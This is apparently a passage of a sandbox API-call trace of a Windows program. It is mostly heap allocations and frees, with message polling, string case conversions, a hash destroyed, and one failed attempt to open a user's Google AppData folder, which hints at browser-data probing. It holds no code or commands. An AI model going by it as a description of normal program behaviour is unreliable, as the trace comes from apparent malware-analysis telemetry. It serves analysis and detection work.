[0209.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0209.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0209.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0209.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0209.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0209.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0209.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0209.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0209.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0209.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0209.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0209.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0209.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0209.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0209.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0209.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0209.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0209.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0209.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0209.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0209.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0209.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0209.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0209.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0209.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0209.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0209.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0209.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0209.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0209.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0209.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0209.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0209.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0209.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0209.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0209.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0209.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0209.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0209.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0209.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0209.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0209.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0209.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0209.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0209.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0209.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0209.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0209.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0209.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0209.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0209.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0209.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0209.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0209.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0209.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0209.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0209.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0209.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0209.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0209.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0209.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0209.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0209.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0209.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0209.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0209.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0209.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0209.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0209.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0209.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0209.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0209.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0209.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0209.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0209.780] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0209.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0209.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0209.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0209.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0209.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0209.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0209.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0209.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0209.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0209.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0209.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0209.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0209.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0209.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0209.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0209.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0209.781] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0209.781] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0209.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0209.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0209.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0209.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0209.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0209.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0209.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0209.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0209.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0209.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0209.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0209.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0209.782] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0209.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0209.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0209.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0209.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0209.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0209.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0209.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0209.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0209.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0209.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0209.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0209.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0209.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0209.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0209.782] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0209.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0209.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0209.783] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0209.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0209.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0209.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0209.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0209.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0209.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0209.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0209.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0209.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0209.783] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0209.783] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0209.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0209.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0209.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0209.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0209.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0209.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0209.784] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0209.784] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0209.784] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0209.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0209.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0209.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0209.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0209.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0209.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0209.784] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0209.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0209.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0209.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0209.784] CryptDestroyHash (hHash=0xaa5660) returned 1 [0209.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0209.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0209.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0209.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0209.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0209.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0209.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0209.785] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0209.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0209.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0209.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0209.785] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0209.785] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.785] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.785] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0209.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0209.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0209.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0209.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0209.786] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Google" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0209.786] GetLastError () returned 0x5 [0209.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0209.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 | out: hHeap=0x25c0000) returned 1 [0209.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0209.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0209.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0209.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0209.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0209.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0209.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0209.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0209.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0209.787] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0209.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0209.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0209.787] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0209.787] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0209.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0209.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0209.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0209.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0209.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0209.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0209.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0209.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0209.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0209.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0209.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0209.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0209.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0209.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0209.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0209.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0209.788] RtlAllocateHeap (HeapHandle=0x25c0000, 